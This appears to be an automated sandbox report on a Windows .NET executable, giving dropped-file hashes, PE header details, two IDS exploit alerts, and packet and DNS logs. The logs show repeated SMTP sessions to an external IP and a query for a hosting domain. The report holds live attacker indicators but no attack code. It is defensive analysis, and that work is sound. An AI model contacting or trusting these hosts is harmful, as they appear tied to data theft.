C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4686422492637545
Encrypted:	false
SSDEEP:	6144:YzZfpi6ceLPx9skLmb0fyZWSP3aJG8nAgeiJRMMhA2zX4WABluuNkjDH5S:OZHtyZWOKnMM6bFpWj4
MD5:	02C867926B8D48487913E5654E7084C8
SHA1:	841A00E49FEA09F886F82DC1E8884AA52283BCD7
SHA-256:	9A3DB6D6A48FE673B09837352C8F08CE4FF9F91CB182B6B9356AFACA8F921F27
SHA-512:	B07F0B67E6944BE29D746A9EFFECA0153C53D491D7AA0D2E8FB74F7347479368F5DF77C1CDAEDC21E16446FE85078EE6600AD16109B42F2E57003951F8EBA074
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm:a.g................................................................................................................................................................................................................................................................................................................................................P..S........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.938253844711648
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	LisectAVT_2403002A_29.exe
File size:	684'153 bytes
MD5:	e6a5050de4674c9280d6fb1a51456867
SHA1:	fde04fb3d905cf314a22836276bc668bfcef2e5a
SHA256:	1b479dc4d8b2e7b2ca7fcda6699835a14223bf7c1540d6100b98f6658c8c165f
SHA512:	c6c9bfb28db70efe4319be6b2af7bc3c22cdab5ed06fb864633d3e18da0eefdc2ec9581d3aed8e9086947cb0b7b1630fce42b66502b9daa7199cf68b41824825
SSDEEP:	12288:zuLD9C9DaFlVqcwO9kuereZz5WgZtjs1Ux6xdE0Is0JAIActwqk67tjbFR:zsuMA7O9nZQktjs1+ps0CI1Ox6nR
TLSH:	D4E413509B2EC137D0DD00BA995140C137BADB7BA3D6DBA7AC06D18A980339077B6F67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....5..........."...0..[............... ....@...... ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xDF358803 [Tue Aug 31 21:49:55 2088 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x17b00	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x15bae	0x15c00	5ab23c3289775a19b1e1867add0f73c2	False	0.5600193067528736	data	6.442924634042317	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x586	0x600	e46060c01b5991dc9b8c2654ef6c8e8d	False	0.4127604166666667	data	4.020824859492868	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x180a0	0x2fc	data			0.43717277486910994
RT_MANIFEST	0x1839c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T21:54:08.020045+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49717	13.85.23.86	192.168.2.6
2024-07-25T21:54:48.645667+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	64310	13.85.23.86	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 21:53:46.322192907 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:46.322192907 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:46.619066000 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:55.931546926 CEST	49674	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:55.931548119 CEST	49673	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:56.228389978 CEST	49672	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:53:57.897183895 CEST	443	49705	173.222.162.64	192.168.2.6
Jul 25, 2024 21:53:57.897393942 CEST	49705	443	192.168.2.6	173.222.162.64
Jul 25, 2024 21:54:08.062258005 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:08.067192078 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:08.067276001 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.508471012 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.509284019 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.514045954 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.514074087 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.514092922 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.514115095 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.519754887 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.691643953 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.691885948 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.696829081 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.850579977 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.860594034 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.860686064 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.870588064 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:09.878269911 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:09.890302896 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.063891888 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.066056967 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.066097975 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.066129923 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.072035074 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.072072029 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.072086096 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.101437092 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.106240034 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.274514914 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.289721012 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.295444012 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.460072041 CEST	64302	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:10.463404894 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.464346886 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.464970112 CEST	53	64302	1.1.1.1	192.168.2.6
Jul 25, 2024 21:54:10.465040922 CEST	64302	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:10.466589928 CEST	64302	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:10.469290018 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.471596003 CEST	53	64302	1.1.1.1	192.168.2.6
Jul 25, 2024 21:54:10.638370991 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.639635086 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.644433975 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.729696035 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.729960918 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.734800100 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.824206114 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.825690985 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.830729961 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.906634092 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.918380976 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:10.923319101 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:10.950754881 CEST	53	64302	1.1.1.1	192.168.2.6
Jul 25, 2024 21:54:10.966814041 CEST	64302	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:10.972820997 CEST	53	64302	1.1.1.1	192.168.2.6
Jul 25, 2024 21:54:10.973048925 CEST	64302	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:10.998753071 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.008270979 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.013178110 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.096088886 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.188606977 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.192457914 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.197419882 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.255080938 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.259983063 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.365092993 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.365844965 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.365936995 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.365962029 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.365977049 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.370773077 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.370804071 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.370861053 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.370913029 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.441611052 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.441741943 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.441776991 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.441797018 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.442174911 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.442235947 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.532170057 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.534034014 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.538938046 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.647600889 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.724942923 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.739192963 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:11.747025967 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:11.767198086 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.177548885 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.177972078 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.180479050 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.180738926 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.184180021 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.359534025 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.360104084 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.365829945 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.573611975 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.573863029 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.579394102 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.813365936 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:12.813734055 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:12.818618059 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.000130892 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.000368118 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:13.006722927 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.178148985 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.185307026 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:13.185373068 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:13.185437918 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:13.185462952 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:13.191101074 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.191140890 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.191169024 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.191226006 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.394656897 CEST	587	49722	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:13.478337049 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:17.417259932 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:17.422404051 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:17.422497034 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.203608990 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.203895092 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.209162951 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.388670921 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.401778936 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.407485008 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.586348057 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.591865063 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.597214937 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.788811922 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.789138079 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.789153099 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.789211988 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.790273905 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.790467024 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.887103081 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:18.888710976 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:18.893580914 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.072175026 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.102086067 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:19.107090950 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.285584927 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.286046028 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:19.290935993 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.471697092 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.472028017 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:19.476902962 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.670022964 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:19.670365095 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:19.675156116 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.742826939 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.743083000 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:20.743917942 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.743973970 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:20.746500969 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.746571064 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:20.746886969 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.746936083 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:20.752012014 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.933281898 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:20.933504105 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:20.938437939 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.139661074 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.152443886 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:21.152555943 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:21.152555943 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:21.152697086 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:21.158293962 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.158327103 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.158425093 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.158454895 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.446913958 CEST	587	64305	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:21.493400097 CEST	64305	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:25.569093943 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:25.638967991 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:25.639045954 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.299036980 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.299467087 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.304694891 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.478414059 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.478773117 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.483616114 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.658349991 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.663360119 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.668548107 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.864458084 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.864515066 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.864531994 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.864590883 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.864681005 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.864732027 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.956845999 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:26.958869934 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:26.963845015 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.143325090 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.161411047 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:27.167298079 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.341885090 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.342430115 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:27.347377062 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.522249937 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.522563934 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:27.527410984 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.709258080 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.709846020 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:27.714684010 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.888251066 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:27.888515949 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:27.893546104 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.075793028 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.076050043 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.080987930 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.254569054 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.255523920 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.255523920 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.255604982 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.255604982 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.260458946 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.260869980 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.261194944 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.261271954 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.547687054 CEST	587	64307	185.174.175.187	192.168.2.6
Jul 25, 2024 21:54:28.603312016 CEST	64307	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:28.836731911 CEST	49722	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:54:37.508989096 CEST	80	49704	217.20.57.27	192.168.2.6
Jul 25, 2024 21:54:37.509176016 CEST	49704	80	192.168.2.6	217.20.57.27
Jul 25, 2024 21:54:37.509279013 CEST	49704	80	192.168.2.6	217.20.57.27
Jul 25, 2024 21:54:37.516875029 CEST	80	49704	217.20.57.27	192.168.2.6
Jul 25, 2024 21:55:48.041274071 CEST	49720	587	192.168.2.6	185.174.175.187
Jul 25, 2024 21:55:48.046479940 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:55:48.252892971 CEST	587	49720	185.174.175.187	192.168.2.6
Jul 25, 2024 21:55:48.263773918 CEST	49720	587	192.168.2.6	185.174.175.187

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 21:54:08.026340008 CEST	61684	53	192.168.2.6	1.1.1.1
Jul 25, 2024 21:54:08.043634892 CEST	53	61684	1.1.1.1	192.168.2.6
Jul 25, 2024 21:54:10.456085920 CEST	53	50372	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 21:54:08.026340008 CEST	192.168.2.6	1.1.1.1	0x9801	Standard query (0)	cp8nl.hyperhost.ua	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 21:54:07.879656076 CEST	1.1.1.1	192.168.2.6	0x966	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
